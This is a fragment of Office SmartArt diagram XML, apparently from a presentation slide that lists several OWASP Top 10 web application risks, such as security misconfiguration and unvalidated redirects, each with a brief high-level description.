    </dgm:pt>
    <dgm:pt modelId="{74651D76-1A4B-4035-A912-0E9B4AC31E56}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A6 – Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{714A456E-0F05-4956-B40C-07B05BE592F8}" type="sibTrans" cxnId="{203150CC-0F3F-45BE-9F5A-D2254D61B2E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6854210-4FAC-4257-B882-980D94C69A89}" type="parTrans" cxnId="{203150CC-0F3F-45BE-9F5A-D2254D61B2E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84FC8053-FDE8-4A4C-8131-8A4B24494FE3}" type="sibTrans" cxnId="{CD4505AB-F295-4DBF-BDE3-234AE1950D08}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41F9CA30-D50A-4966-BDAE-8D4514BFA5E0}" type="parTrans" cxnId="{CD4505AB-F295-4DBF-BDE3-234AE1950D08}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FB0F712-7A12-4305-A804-F19DB2A74F1D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{983F9778-1966-4F92-9D76-49AED59BA5D1}" type="parTrans" cxnId="{B5311067-92D2-419F-BCCF-525CEFFE4616}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9B9B97E-B4C8-4806-B7B1-0C0989D9A093}" type="sibTrans" cxnId="{B5311067-92D2-419F-BCCF-525CEFFE4616}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A8 - Failure to Restrict URL Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF1391D4-B6B7-4AE2-B993-338C00C11B84}" type="parTrans" cxnId="{1AA23A82-4061-401B-A47E-EFAC421C5C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05EEABB9-F420-43FF-B065-1A7F16C9839E}" type="sibTrans" cxnId="{1AA23A82-4061-401B-A47E-EFAC421C5C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A10 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>Unvalidated</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> Redirects and Forwards</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5ADD28B-795D-4030-8D34-142FCD3ADFA1}" type="parTrans" cxnId="{56EABEEA-509F-4220-B7FD-7B176CA17F0C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E086090F-2561-40F5-94CB-7FFBE1252C88}" type="sibTrans" cxnId="{56EABEEA-509F-4220-B7FD-7B176CA17F0C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4E8E996-7C5B-4BA4-B933-DE6C0BAA3728}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Web applications frequently redirect and forward users to other pages and websites, and use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9927FDB-9211-4A14-A3B9-13F746B34567}" type="parTrans" cxnId="{9421F470-78C5-4566-AEE3-B492692D7446}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEE520DC-DC8B-451B-A49E-0F5C4A893DD2}" type="sibTrans" cxnId="{9421F470-78C5-4566-AEE3-B492692D744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10" custScaleX="48148">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10">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06753445-795E-4852-B39B-5A81E3AE22FA}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52F1B1A3-C58C-409E-9189-6742201CA556}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60C6FAA5-309B-4E4D-9AF3-F9B36FA3793F}" type="pres">
      <dgm:prSet presAssocID="{528554B3-3377-4274-ADB1-6970BE43DEBB}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{607560B6-B977-4D1C-97A0-595C7A55205A}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{232A10D5-9CE7-4866-9B98-3442E96D191C}" type="pres">
      <dgm:prSet presAssocID="{68A5A658-9210-4933-94F8-E5EB41BF4147}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56A0CB35-4DB9-4A39-BA7D-CE8C25A49E42}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{191C5091-28DD-4765-9653-28B6CE68C4E4}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A6A0E46-45CA-442A-8601-BBA2D73584E4}" type="pres">
      <dgm:prSet presAssocID="{ECA2D58B-5985-4D42-8ACF-DA4EEB388D97}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F793DF08-4A07-4166-B1E1-1D362BA95C8F}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E090A74-1099-4AEA-9902-A404935E56DA}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{614D783F-9EA6-4A55-A7F2-79B49F95A4D5}" type="pres">
      <dgm:prSet presAssocID="{0D3D0307-BCC6-4666-B008-AB05B3454592}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C6E04D9-34F9-48BA-AE99-367B8D0960C9}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A869A77-087B-4990-95D8-340F0D6466A4}" type="pres">
      <dgm:prSet presAssocID="{714A456E-0F05-4956-B40C-07B05BE592F8}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07DBCB74-C0C4-443F-B333-47E942AEDD04}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="6" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E59023DB-6273-42AA-AC15-3F73F1A109E5}" type="pres">
      <dgm:prSet presAssocID="{DC6AC552-EC1D-4C41-BC2A-2A31755C14D6}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" type="pres">
      <dgm:prSet presAssocID="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}" type="pres">
      <dgm:prSet presAssocID="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" presName="parentText" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}" type="pres">
      <dgm:prSet presAssocID="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="7" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8EE57E-71C8-45FF-8F85-DB1D3B00675A}" type="pres">
      <dgm:prSet presAssocID="{05EEABB9-F420-43FF-B065-1A7F16C9839E}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" type="pres">
      <dgm:prSet presAssocID="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}" type="pres">
      <dgm:prSet presAssocID="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" presName="parentText" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEEED12-760D-417A-B975-196C59CB31B8}" type="pres">
      <dgm:prSet presAssocID="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="8" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0CBEA6D-B12F-4310-BB76-D6EA68F3F0F3}" type="pres">
      <dgm:prSet presAssocID="{D2E7E824-9857-4FA1-8D4C-966BADFFD02E}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" type="pres">
      <dgm:prSet presAssocID="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}" type="pres">
      <dgm:prSet presAssocID="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" presName="parentText" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}" type="pres">
      <dgm:prSet presAssocID="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="9" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A9EEFAB9-4C27-46E2-9E49-F1B133D55D4B}" type="presOf" srcId="{5DA0AAD8-DB42-4198-B614-1D5996278F65}" destId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1EFD55FE-6872-434D-8EFD-C07A4192FB97}" type="presOf" srcId="{DA7DD3FF-C2BA-419E-88D3-4DE8B0D3FE4D}" destId="{52F1B1A3-C58C-409E-9189-6742201CA556}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{18B0E9E8-7E8F-4AB4-83AB-1ADC8CFA4CDE}" type="presOf" srcId="{A1B85367-743A-4C9F-A891-07038BBF96F2}" destId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{574FFFBE-7C5B-403B-8F4C-5295D17C30DC}" type="presOf" srcId="{C4E8E996-7C5B-4BA4-B933-DE6C0BAA3728}" destId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B848EF3F-7587-4A88-B7F3-FF3128594EB4}" type="presOf" srcId="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}" destId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D43BC85-4946-48BE-919A-6DDBEDD883C6}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6BA2657-A55D-4DAB-8EE5-B6CD8738C915}" srcId="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" destId="{25555832-CE6E-49DC-8853-636E1959542E}" srcOrd="0" destOrd="0" parTransId="{949AE632-8A31-479F-9DE5-DEB648FA5F47}" sibTransId="{22A8181F-3DA9-4EBB-9991-856323D70780}"/>
    <dgm:cxn modelId="{DC87E294-BD79-4526-93BD-B9A1A983F979}" type="presOf" srcId="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}" destId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3953A1EE-3547-4BC3-8597-4D4809BBF654}" type="presOf" srcId="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" destId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BA4D9481-1FA9-4104-AE41-818FA1E75DC7}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{2BD590FA-9231-49C0-97E0-217A496C2237}" srcOrd="3" destOrd="0" parTransId="{09FCF6D7-DCB3-4316-B5AF-4A79E28A3947}" sibTransId="{ECA2D58B-5985-4D42-8ACF-DA4EEB388D97}"/>
    <dgm:cxn modelId="{CEABDA5D-2CCD-47EA-91C3-340B08D5CA35}" srcId="{C7383E11-2997-46ED-9CDE-19D4351797B7}" destId="{DA7DD3FF-C2BA-419E-88D3-4DE8B0D3FE4D}" srcOrd="0" destOrd="0" parTransId="{A3E3EC78-9BBC-41A1-9C38-D8A0F920D1EE}" sibTransId="{35D55CF6-A108-42C3-AD8E-0484F859C755}"/>
